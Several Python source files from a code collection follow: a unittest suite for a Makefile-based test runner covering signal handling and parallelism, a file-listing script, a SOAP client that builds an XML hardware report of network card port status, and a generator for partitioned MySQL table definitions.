import time
import signal
import psutil
import multiprocessing
def wait_for_condition(cond, true_count=1, max_retries=None, sleep_time=0.1 ):
retry = 0
while not cond() and (max_retries == None or retry < max_retries):
time.sleep(sleep_time)
retry = retry + 1
if retry == max_retries:
assert not "Condition was not true after {} retries".format(max_retries)
class TempDir(object):
""" A class that creates a temp directory at context creation time and
removes the temp dir at exit of the context."""
def __init__(self,retain=False):
# For debuggability, if retain is True, do not delete the temp dir
self.retain = retain
def __enter__(self):
self.d = tempfile.mkdtemp()
logging.debug("Using temporary directory: {}".format(self.d))
return self
def dir(self):
return self.d
def __exit__(self,type,value,traceback):
if self.retain:
msg = "TempDir: {0}".format(self.d)
logging.debug(msg)
print(msg)
else:
shutil.rmtree(self.d,ignore_errors=True)
return False
class Test(unittest.TestCase):
@staticmethod
def initLog(level):
"""Init the basic logging"""
logging.basicConfig(
format="%(asctime)s %(process)d %(threadName)s %(levelname)s " \
+"%(message)s",
stream=sys.stderr,
level=level)
@staticmethod
def _makefile_test_path():
""" Return the absolute path os the Makefile.test in this repo.
The actual file that is distributed via this repo"""
# Get the dir of the current script (TestVariousMakeInvocation.py) and
# from there knowing the directory structure of the repo, reach to the
# Makefile.test
# TODO: This section strictly depends on the file hierarchy of the repo.
file_dir = os.path.dirname(os.path.abspath(__file__))
repo_root_dir = os.path.dirname(file_dir)
makefile_test_path = os.path.join(repo_root_dir,"Makefile.test")
rv = os.path.realpath(os.path.abspath(makefile_test_path))
assert os.path.isfile(rv) and "Could not find Makefile.test"
return rv
@staticmethod
def copy_makefile_test_to(d):
"""Copy the Makefile.test file from this repo to the given dir"""
src = Test._makefile_test_path()
dest = os.path.join(d, "Makefile.test")
shutil.copy(src, dest)
@staticmethod
def populate_test_dir(d, tests, test_dir_relative_to_makefile):
"""The given directory is the directory for the tests. Add the leaf makefile
there and copy the test scripts."""
if test_dir_relative_to_makefile == Test.same_dir:
path_to_makefile_test = "."
elif test_dir_relative_to_makefile == Test.child_dir:
path_to_makefile_test = ".."
else:
assert not "unexpected test_dir_relative_to_makefile"
contents = string.Template("""
TESTS ?= ${tests}
MAKEFILE_DIR := $$(shell dirname $$(realpath $$(lastword $$(MAKEFILE_LIST))))
include $$(MAKEFILE_DIR)/${path_to_makefile_test}/Makefile.test
""").substitute(
tests=" ".join(tests),
path_to_makefile_test=path_to_makefile_test)
contents = textwrap.dedent(contents)
leaf_makefile_name = "Makefile"
leaf_makefile_path = os.path.join(d, leaf_makefile_name)
with open(leaf_makefile_path, "w") as f:
f.write(contents)
file_dir = os.path.dirname(os.path.abspath(__file__))
for test_file in tests:
shutil.copy(os.path.join(file_dir, test_file),
os.path.join(d, test_file))
@staticmethod
def make_dirs_ignore_existing(p):
"""unix mkdir -p functionality. Creates the directory given in the path
p. Also creates the intermediate directories. Does not complain if the
root directory exists already."""
try:
os.makedirs(p)
except OSError as e:
if e.errno==errno.EEXIST and os.path.isdir(p):
pass
else:
raise
def find_file_at_root(self, d, seeked_files):
"""Check whether at least one of the given seeked_files exist in the given
directory root. If found return the name of the file, otherwise return
None"""
for root, dirs, files in os.walk(d):
for file_name in files:
if file_name in seeked_files:
return file_name
return None
def check_no_intermediate_files(self, d):
"""Verify that in the directory tree rooted at d there are no intermediate
files left behind"""
# taken from the makefile.
intermediate_file_names = [".makefile_test_failed_tests",
".makefile_test_executed_tests"]
found_file = self.find_file_at_root(d, intermediate_file_names)
if found_file != None:
self.assertFalse("Found unexpected file: {} in dir: {}".format(
found_file, d))
def check_return_value(self, rv, expected_rv):
"""If expected_rv is zero, return value must be zero.
If expected_outpus is non_zero, then the return value must be non_zero"""
self.assertEqual(rv, expected_rv)
def check_output(self, out, expected_output):
""" Verify the stdout from the makefile. The given regex in expected_output
must match in out"""
self.assertRegexpMatches(out, expected_output)
@staticmethod
def pids_of_descendant_sleep(pid):
"""Look at all of the descendants of pid and find the sleep processes.
Return the sleeps' pids"""
p = psutil.Process(pid)
descendants = p.children(recursive=True)
sleep_pid = []
for d in descendants:
if "sleep" in d.exe():
assert not (d.pid in sleep_pid)
sleep_pid.append(d.pid)
return sleep_pid
@staticmethod
def sleep_process_with_pid(pid):
"""Check that a sleep process with the given pid exists or not.
If it does not return none"""
try:
p = psutil.Process(pid)
except psutil.NoSuchProcess as e:
return None
exe = None
while exe is None:
try:
exe = p.exe()
except psutil.AccessDenied as e:
pass
except psutil.NoSuchProcess as e:
return None
if "sleep" in exe:
return p
else:
return None
@staticmethod
def get_clean_env():
"""Get an environment to passed to the make executions.
This script is executed in the same Makefile itself remove the
exported environment variables so that the make execution tests can
start from a clean slate"""
env = dict(os.environ)
env.pop("TESTS", None)
env.pop("FIRST_MAKEFILE", None)
env.pop("FIRST_MAKEFILE_DIR", None)
env.pop("TEST_TARGETS", None)
return env
wait, term, sigint = range(3)
do_check, skip_check = range(2)
def call_make_do_checks(self, cmd, parent_dir, run_dir, expected_rv,
expected_output, subprocess_handling, check_intermediate_files):
"""Spawns the make command and does some additional checking."""
# remove the exported makefile variables from the environment.
# This test verifies the Makefile.test but it is executed using
# Makefile.test. The tests in this repo also use the Makefile.test. In
# the supported use case Makefile.test is designed to be a singleton.
# With removing these exported variables, we remove the modifications
# the parent makefile did on the environment.
env = Test.get_clean_env()
descendent_sleep_pids = None
def in_new_pgrp():
os.setpgrp()
return
if subprocess_handling == Test.wait:
p = subprocess.Popen(cmd,
cwd=run_dir,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
elif subprocess_handling == Test.term:
p = subprocess.Popen(cmd,
cwd=run_dir,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
# Wait for an executedTests file to appear. That means the tests
# have started. Then terminate the make.
wait_for_condition(lambda: self.find_file_at_root(parent_dir, \
[".makefile_test_executed_tests"]) != None)
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
while len(descendent_sleep_pids) == 0:
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
# Send the signal to the entire process group id.
# Killing the process group is the recommended way to kill hung makes.
os.killpg(p.pid, signal.SIGTERM)
elif subprocess_handling == Test.sigint:
# Make has child processes. We want to send the SIGINT to the
# entire process group of make. This resembles the CTRL-C behavior
# from the terminal. In order to get its own process group, we call
# the preexec_fn before spawn
p = subprocess.Popen(cmd,
cwd=run_dir,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
# Wait for an executedTests file to appear. That means the tests
# have started. Then ctrl-C the make .
wait_for_condition(lambda: self.find_file_at_root(parent_dir, \
[".makefile_test_executed_tests"]) != None)
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
while len(descendent_sleep_pids) == 0:
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
# Send the signal to the entire process group id.
os.killpg(p.pid, signal.SIGINT)
out, err = p.communicate()
rv = p.returncode
logging.debug(out)
logging.debug(err)
self.check_return_value(rv, expected_rv)
if expected_output is not None:
self.check_output(out, expected_output)
if check_intermediate_files == Test.do_check:
self.check_no_intermediate_files(parent_dir)
self.check_no_intermediate_files(run_dir)
if descendent_sleep_pids != None:
# If we had any sleep processes, then they must have disappered by now.
self.assertTrue(all(
[Test.sleep_process_with_pid(p) == None \
for p in descendent_sleep_pids]))
def handle_additional_filename(self,additional_file_name, test_dir_path):
"""The test_dir_path needs to have an additional_file_name. If the
additional_file_name exists in current dir, copy it over. Otherwise
create a new file in test_dir_path"""
this_file_dir = os.path.dirname(os.path.abspath(__file__))
file_path = os.path.join(this_file_dir, additional_file_name)
if os.path.isfile(file_path):
shutil.copy(file_path, test_dir_path)
else:
with open(os.path.join(test_dir_path, additional_file_name), "w"):
pass
same_dir, child_dir = range(2)
def make_execution(self,
test_dir_relative_to_makefile,
tests,
expected_rv,
expected_output,
subprocess_handling,
check_intermediate_files,
additional_file_name=None,
):
"""Execute make in various different ways in a tests directory.
1) cd <test_dir> && make check
2) make -C <test_dir> make check
3) make -f <test_dir>/Makefile check
Depending on test_dir_relative_to_makefile, the
The leaf makefile and the Makefile.test can be in the same or different
directories.
tests is a list of names of the tests to execute.
Depending on expected_rv, the test are checked to pass or fail
The regex given in expected_output must match in the stdout of the make
execution
subprocess_handling determines whether the caller is going to wait for make
to complete, or terminate it or kill it.
if an additional_file_name is specified, then a new file with that name
is placed in the test directory. If the file exists in current dir,
that gets copied. Otherwise a new file is touched. """
with TempDir() as td:
d = td.dir()
if test_dir_relative_to_makefile == Test.same_dir:
test_dir_path = d
elif test_dir_relative_to_makefile == Test.child_dir:
test_dir_path = os.path.join(d, "test")
else:
assert not "unexpected test_dir_relative_to_makefile"
Test.make_dirs_ignore_existing(test_dir_path)
if additional_file_name != None:
self.handle_additional_filename(additional_file_name, test_dir_path)
Test.copy_makefile_test_to(d)
Test.populate_test_dir(test_dir_path, tests,
test_dir_relative_to_makefile)
# Execute make with jobserver and without.
self.call_make_do_checks(["make"], d, test_dir_path, expected_rv,
expected_output, subprocess_handling, check_intermediate_files)
self.call_make_do_checks(["make", "-j"], d, test_dir_path, expected_rv,
expected_output, subprocess_handling, check_intermediate_files)
with TempDir() as runDir:
rd = runDir.dir()
self.call_make_do_checks(["make", "-C", test_dir_path], d, rd,
expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
self.call_make_do_checks(["make", "-j", "-C", test_dir_path], d, rd,
expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
leaf_makefile_path = os.path.join(test_dir_path, "Makefile")
self.call_make_do_checks(["make", "-f", leaf_makefile_path], d, rd,
expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
self.call_make_do_checks(["make", "-j", "-f", leaf_makefile_path],
d, rd, expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
def test_make_execution_success(self):
"""Verify make behavior if the outcome is successful. Either all tests
have passes or there were no tests to start with."""
logging.debug("Running success tests")
self.make_execution(Test.child_dir,
["passing_test.sh"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.child_dir,
["passing_test.sh", "passing_test1.sh"],
0,
"All\s*2 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["passing_test.sh"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["passing_test.sh","passing_test1.sh"],
0,
"All\s*2 tests passed",
Test.wait,
Test.do_check)
# Empty Test.
self.make_execution(Test.child_dir,
[],
0,
"All\s*0 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
[],
0,
"All\s*0 tests passed",
Test.wait,
Test.do_check)
# A python test
self.make_execution(Test.child_dir,
["ExamplePythonTest.py"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check,
additional_file_name="ExamplePythonLibrary.py")
self.make_execution(Test.same_dir,
["ExamplePythonTest.py"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check,
additional_file_name="ExamplePythonLibrary.py")
def test_make_execution_failure(self):
"""Verify make behavior if the outcome is unsuccessful. At least one test
has failed."""
logging.debug("Running failure tests")
self.make_execution(Test.child_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.child_dir,
["failing_test.sh", "failing_test1.sh"],
2,
"Failed\s*2 out of\s*2 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["failing_test.sh", "failing_test1.sh"],
2,
"Failed\s*2 out of\s*2 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.child_dir,
["passing_test.sh", "failing_test.sh"],
2,
"Failed\s*1 out of\s*2 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["passing_test.sh", "failing_test.sh"],
2,
"Failed\s*1 out of\s*2 tests",
Test.wait,
Test.do_check)
# A target with "TARGET_FOR_" prefix is used in the Makefile.test
# implementation. We make sure we still execute the test even if
# coincidentally there is a file with that name in the test directory.
self.make_execution(Test.child_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check,
additional_file_name="TARGET_FOR_failing_test.sh")
self.make_execution(Test.same_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check,
additional_file_name="TARGET_FOR_failing_test.sh")
def test_make_execution_sigterm(self):
"""Verify make behavior if it is terminated with SIGTERM"""
logging.debug("Running sigterm tests")
tests_lists = [
["indefinite_test.sh"],
["indefinite_test.sh", "indefinite_test1.sh"],
["indefinite_test.py"],
["indefinite_test.py", "indefinite_test1.py"],
]
for test_list in tests_lists:
# Makefile.test does not print a summary line if it gets TERMINATED
self.make_execution(Test.child_dir,
test_list,
-signal.SIGTERM,
None,
Test.term,
Test.do_check)
self.make_execution(Test.same_dir,
test_list,
-signal.SIGTERM,
None,
Test.term,
Test.do_check)
def test_make_execution_sigint(self):
"""Verify make behavior if it is terminated with a CTRL-C from the terminal
AKA send sigint to its process group"""
logging.debug("Running sigint tests")
tests_lists = [
["indefinite_test.sh"],
["indefinite_test.sh", "indefinite_test1.sh"],
# Python exits with 1 in case of an unhandled KeyboardInterrupt
# instaed of -SIGINT. It is worth testing our Makefile.test with
# executables that does not exit with -SIGINT in terms of a SIGINT.
["indefinite_test.py"],
["indefinite_test.py", "indefinite_test1.py"],
]
for test_list in tests_lists:
# Makefile.test does not print a summary line if it gets CTRL-C'ed
self.make_execution(Test.child_dir,
test_list,
-signal.SIGINT,
None,
Test.sigint,
Test.skip_check)
self.make_execution(Test.same_dir,
test_list,
-signal.SIGINT,
None,
Test.sigint,
Test.skip_check)
@staticmethod
def descendant_sleep_process_count(pid):
"""Count the number of descendant sleep processes of the given pid"""
p = psutil.Process(pid)
descendants = p.children(recursive=True)
sleep_count = 0
for d in descendants:
if "sleep" in d.exe():
sleep_count = sleep_count + 1
return sleep_count
def make_parallelism(self, cmd, tests, expected_parallel_jobs):
""" Populate a test dir with the given tests, execute the given cmd.
While the test is running verify that the expected number of parallel
jobs can be found in the recursive chidren of the make command"""
with TempDir() as td:
d = td.dir()
Test.copy_makefile_test_to(d)
Test.populate_test_dir(d, tests, Test.same_dir)
env = Test.get_clean_env()
def in_new_pgrp():
os.setpgrp()
return
p = subprocess.Popen(cmd,
cwd=d,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
pid = p.pid
wait_for_condition(lambda: self.find_file_at_root(d, \
[".makefile_test_executed_tests"]) != None)
# Both of the indefinite_tests should be running in parallel.
check_count = 3
for i in range(check_count):
wait_for_condition(lambda: Test.descendant_sleep_process_count(pid) \
== expected_parallel_jobs)
os.killpg(pid, signal.SIGTERM)
out, err = p.communicate()
logging.debug(out)
logging.debug(err)
@unittest.skipIf(multiprocessing.cpu_count() == 1,
"Host machine has only 1 processor, it does not support parallel execution.")
def test_make_parallelism(self):
"""Verify that parallel execution of make actually executes processes in
parallel"""
self.make_parallelism(["make", "-j"],
["indefinite_test.sh", "indefinite_test1.sh"],
2)
self.make_parallelism(["make", "-j", "1"],
["indefinite_test.sh", "indefinite_test1.sh"],
1)
if __name__ == '__main__':
Test.initLog(logging.DEBUG)
unittest.main()
# Test Plan
# 1) Add a test to verify command line overwrite of TESTS.
``` |
{
"source": "jia57196/code41",
"score": 3
} |
#### File: test/gn_persist_call_id/list-files.py
```python
import os, sys, time
if len(sys.argv) < 2:
print "usage: %s directory..." % sys.argv[0]
sys.exit(1)
def get_date(file_name):
i = file_name.rfind('-')
if i == -1:
return ""
t = int(file_name[i+1:])
return time.ctime(t)
for dir in sys.argv[1:]:
print dir
for file_name in sorted(os.listdir(dir)):
print " %s - %s" % (file_name, get_date(file_name))
```
#### File: iwf/scripts/pi-br.py
```python
import os, sys, tempfile
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import suds
import urllib2
import xml.etree.ElementTree
from xml.etree.ElementTree import Element
url = 'https://localhost:8443/instrument/externalAPI.cfc?wsdl'
user = "Administrator"
password = "<PASSWORD>"
class Card:
def __init__(self, number, model, serial_number, mode):
self.number = number
self.model = model
self.serial_number = number
self.mode = mode
self.ports = list()
def add_port(self, port):
self.ports.append(port)
class Port:
def __init__(self, number):
self.number = number
class PI_API(suds.client.Client):
def __init__(self, url):
"""May throw an exception if url is invalid"""
super(PI_API, self).__init__(url)
def get_card_info(self, user, password):
try:
info = self.service.getAboutAppliance(user, password)
#print info
except suds.WebFault as error:
print >> sys.stderr, error.args
return None
root_element = xml.etree.ElementTree.XML(info)
cards = dict()
for card_element in root_element.getiterator("card"):
for child in card_element.getiterator():
if child.tag == "cardNum":
number = child.text
elif child.tag == "model":
model = child.text
elif child.tag == "sn":
serial_number = child.text
elif child.tag == "mode":
mode = child.text
cards[number] = Card(number, model, serial_number, mode)
return cards
def get_card_and_port_status(self, user, password):
try:
status = self.service.getCardAndPortStatus(user, password)
#print status
except suds.WebFault as error:
print >> sys.stderr, error.args
return None
return xml.etree.ElementTree.XML(status)
def merge(self, cards, status):
for port_status in status.getiterator("portStatus"):
card_number = port_status.findtext("card")
if card_number not in cards:
continue
port_number = port_status.findtext("port")
port = Port(port_number)
cards[card_number].add_port(port)
for child in port_status.getiterator():
if child.tag == "time":
port.status_time = child.text
elif child.tag == "status":
port.status = child.text
elif child.tag == "speed":
port.speed = child.text
elif child.tag == "utilization":
port.utilization = child.text
elif child.tag == "dBm":
port.dBm = child.text
elif child.tag == "sfp":
port.sfp = child.text
elif child.tag == "fcsErrors":
port.fcsErrors= child.text
elif child.tag == "framesCount":
port.framesCount = child.text
elif child.tag == "framesDropped":
port.framesDropped = child.text
return cards
def build_report(self, cards):
root_element = Element("hardware")
root_element.text = "\n "
vendor = Element("vendor")
vendor.text = "BladeRocket"
vendor.tail = "\n "
root_element.append(vendor)
for card_number, card in cards.iteritems():
card_element = Element("card")
card_element.text = "\n" + (" " * 8)
self.add_child(card_element, "number", card.number, 8)
self.add_child(card_element, "model", card.model, 8)
self.add_child(card_element, "serial-number", card.serial_number, 8)
self.add_child(card_element, "mode", card.mode, 8)
port_element = None
for port in card.ports:
port_element = Element("port")
port_element.text = "\n" + (" " * 12)
child = self.add_child(port_element, "number", port.number, 12)
child = self.add_child(port_element, "time", port.status_time, 12)
child = self.add_child(port_element, "status", port.status, 12)
child = self.add_child(port_element, "speed", port.speed, 12)
child = self.add_child(port_element, "utilization", port.utilization, 12)
child = self.add_child(port_element, "dBm", port.dBm, 12)
child = self.add_child(port_element, "sfp", port.sfp, 12)
child = self.add_child(port_element, "fcsErrors", port.fcsErrors, 12)
child = self.add_child(port_element, "framesCount", port.framesCount, 12)
child = self.add_child(port_element, "framesDropped", port.framesDropped, 12)
child.tail = "\n" + (" " * 8) # correction
port_element.tail = "\n" + (" " * 8)
card_element.append(port_element)
if port_element:
port_element.tail = "\n" + (" " * 4) # correction
card_element.tail = "\n" + (" " * 4)
root_element.append(card_element)
card_element.tail = "\n" # correction
return xml.etree.ElementTree.tostring(root_element)
def add_child(self, element, tag, text, indent):
child = Element(tag)
child.text = text
child.tail = "\n" + (" " * indent)
element.append(child)
return child
def get_report(self, user, password):
report = self.get_napatech_card_report()
if report:
return report
cards = self.get_card_info(user, password)
if not cards:
return None
status = self.get_card_and_port_status(user, password)
if status is None:
return None
cards = self.merge(cards, status)
return self.build_report(cards)
def get_napatech_card_report(self):
"""Return None if no napatech card is installed in the system."""
try:
status = self.service.getCardAndPortStatus(user, password)
#print status
if status.find("<card>Napatech-") == -1:
return None
except suds.WebFault as error:
print >> sys.stderr, error.args
return None
root_element = Element("hardware")
root_element.text = "\n "
vendor = Element("vendor")
vendor.text = "Napatech"
vendor.tail = "\n "
root_element.append(vendor)
card_element = Element("card")
card_element.text = "\n" + (" " * 8)
self.add_child(card_element, "number", "1", 8)
tree = xml.etree.ElementTree.XML(status)
port_element = None
for port_status in tree.getiterator("portStatus"):
card = port_status.findtext("card")
if not card.startswith("Napatech-"):
continue
port_number = port_status.findtext("port")
port = Port(port_number)
for child in port_status.getiterator():
if child.tag == "time":
port.status_time = child.text
elif child.tag == "status":
port.status = child.text
elif child.tag == "speed":
port.speed = child.text
elif child.tag == "utilization":
port.utilization = child.text
elif child.tag == "dBm":
port.dBm = child.text
elif child.tag == "sfp":
port.sfp = child.text
elif child.tag == "fcsErrors":
port.fcsErrors= child.text
elif child.tag == "framesCount":
port.framesCount = child.text
elif child.tag == "framesDropped":
port.framesDropped = child.text
port_element = Element("port")
port_element.text = "\n" + (" " * 12)
child = self.add_child(port_element, "number", port.number, 12)
child = self.add_child(port_element, "time", port.status_time, 12)
child = self.add_child(port_element, "status", port.status, 12)
child = self.add_child(port_element, "speed", port.speed, 12)
child = self.add_child(port_element, "utilization", port.utilization, 12)
child = self.add_child(port_element, "dBm", port.dBm, 12)
child = self.add_child(port_element, "sfp", port.sfp, 12)
child = self.add_child(port_element, "fcsErrors", port.fcsErrors, 12)
child = self.add_child(port_element, "framesCount", port.framesCount, 12)
child = self.add_child(port_element, "framesDropped", port.framesDropped, 12)
child.tail = "\n" + (" " * 8) # correction
port_element.tail = "\n" + (" " * 8)
card_element.append(port_element)
if port_element:
port_element.tail = "\n" + (" " * 4) # correction
card_element.tail = "\n" + (" " * 4)
root_element.append(card_element)
card_element.tail = "\n" # correction
return xml.etree.ElementTree.tostring(root_element)
if __name__ == "__main__":
try:
pi = PI_API(url)
status = pi.get_report(user, password)
if status:
hwpath = os.path.join(tempfile.gettempdir(), "xt_hw_probe.txt")
f = open(hwpath, "w")
f.write(status)
f.close()
except urllib2.URLError as error:
# Most likely, no PI hardware. If hardware is present, could be because
# the web server is done.
print >> sys.stderr, error.args
except IOError as error:
print >> sys.stderr, error.args
```
#### File: PI-slim-napa/db/initPartitionTables.py
```python
totalPartitions = 2016
FILE = open("partitionTables.sql","w")
FILE.write("USE recd;\n")
def createTunnelTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
tunnelName = "tunnel_" + repr(partition);
str_list.append(tunnelName)
dropStmt = "DROP TABLE IF EXISTS " + tunnelName + ";\n"
createStmt = "CREATE TABLE " + tunnelName + " (id SERIAL , teid BIGINT UNSIGNED , call_trace_id BIGINT UNSIGNED , tunnel_ip_pair_id BIGINT UNSIGNED, interface_type TINYINT, start_time TIMESTAMP );\n"
alterStmt = "ALTER TABLE " + tunnelName + " ADD INDEX(start_time), ADD INDEX(call_trace_id), ADD INDEX(teid), ADD INDEX(tunnel_ip_pair_id), ADD INDEX(interface_type);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE tunnel (id SERIAL , teid BIGINT UNSIGNED , call_trace_id BIGINT UNSIGNED , tunnel_ip_pair_id BIGINT UNSIGNED, interface_type TINYINT, start_time TIMESTAMP ) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS tunnel;\n")
FILE.write(mergeStmt)
tunnelName="tunnel"
alterStmt = "ALTER TABLE " + tunnelName + " ADD INDEX(start_time), ADD INDEX(call_trace_id), ADD INDEX(teid), ADD INDEX(tunnel_ip_pair_id), ADD INDEX(interface_type);\n"
FILE.write(alterStmt)
def createCallTraceTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
callTraceName = "call_trace_" + repr(partition);
str_list.append(callTraceName)
dropStmt = "DROP TABLE IF EXISTS " + callTraceName + ";\n"
createStmt = "CREATE TABLE " + callTraceName + " (id SERIAL , start_time TIMESTAMP , msg_list_on_disk BIGINT UNSIGNED, ue_id BIGINT UNSIGNED);\n"
alterStmt = "ALTER TABLE " + callTraceName + " ADD INDEX(start_time), ADD INDEX(ue_id);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE call_trace (id SERIAL , start_time TIMESTAMP , msg_list_on_disk BIGINT UNSIGNED, ue_id BIGINT UNSIGNED ) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS call_trace;\n")
FILE.write(mergeStmt)
callTraceName="call_trace"
alterStmt = "ALTER TABLE " + callTraceName + " ADD INDEX(start_time), ADD INDEX(ue_id);\n"
FILE.write(alterStmt)
def createCallTraceEndTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
callTraceEndName = "call_trace_end_" + repr(partition);
str_list.append(callTraceEndName)
dropStmt = "DROP TABLE IF EXISTS " + callTraceEndName + ";\n"
createStmt = "CREATE TABLE " + callTraceEndName + " (id SERIAL , reason INT, end_time TIMESTAMP);\n"
alterStmt = "ALTER TABLE " + callTraceEndName + " ADD INDEX(end_time);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE call_trace_end (id SERIAL, reason INT, end_time TIMESTAMP) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS call_trace_end;\n")
FILE.write(mergeStmt)
CallTraceEndName = "call_trace_end"
alterStmt = "ALTER TABLE call_trace_end ADD INDEX(end_time);\n"
FILE.write(alterStmt)
def createTunnelEndTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
tunnelEndName = "tunnel_end_" + repr(partition);
str_list.append(tunnelEndName)
dropStmt = "DROP TABLE IF EXISTS " + tunnelEndName + ";\n"
createStmt = "CREATE TABLE " + tunnelEndName + " (id SERIAL , reason INT, end_time TIMESTAMP, teid BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED);\n"
alterStmt = "ALTER TABLE " + tunnelEndName + " ADD INDEX(end_time), ADD INDEX(call_trace_id), ADD INDEX(teid);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE tunnel_end (id SERIAL, reason INT, end_time TIMESTAMP, teid BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS tunnel_end;\n")
FILE.write(mergeStmt)
tunnelEndName = "tunnel_end"
alterStmt = "ALTER TABLE " + tunnelEndName + " ADD INDEX(end_time), ADD INDEX(call_trace_id), ADD INDEX(teid);\n"
FILE.write(alterStmt)
def createUeIpPartitionTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
ueIpPartitionName = "ue_ip_part_" + repr(partition);
str_list.append(ueIpPartitionName)
dropStmt = "DROP TABLE IF EXISTS " + ueIpPartitionName + ";\n"
createStmt = "CREATE TABLE " + ueIpPartitionName + " (id SERIAL, ue_id BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED, is_ipv6 BOOL, ms_ip_addr BIGINT UNSIGNED, ls_ip_addr BIGINT UNSIGNED, interface_type TINYINT, detect_time TIMESTAMP, apn_id BIGINT UNSIGNED, bearer_id TINYINT);\n"
alterStmt = "ALTER TABLE " + ueIpPartitionName + " ADD INDEX(ue_id), ADD INDEX(call_trace_id), ADD INDEX(is_ipv6), ADD INDEX(ms_ip_addr), ADD INDEX(ls_ip_addr), ADD INDEX(interface_type), ADD INDEX(detect_time);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE ue_ip_part (id SERIAL, ue_id BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED, is_ipv6 BOOL, ms_ip_addr BIGINT UNSIGNED, ls_ip_addr BIGINT UNSIGNED, interface_type TINYINT, detect_time TIMESTAMP, apn_id BIGINT UNSIGNED, bearer_id TINYINT) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS ue_ip_part;\n")
FILE.write(mergeStmt)
ueIpPartitionName = "ue_ip_part"
alterStmt = "ALTER TABLE " + ueIpPartitionName + " ADD INDEX(ue_id), ADD INDEX(call_trace_id), ADD INDEX(is_ipv6), ADD INDEX(ms_ip_addr), ADD INDEX(ls_ip_addr), ADD INDEX(interface_type), ADD INDEX(detect_time);\n"
FILE.write(alterStmt)
def createIpFlowTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
ipFlowPartitionName = "ip_flow_" + repr(partition);
str_list.append(ipFlowPartitionName)
dropStmt = "DROP TABLE IF EXISTS " + ipFlowPartitionName + ";\n"
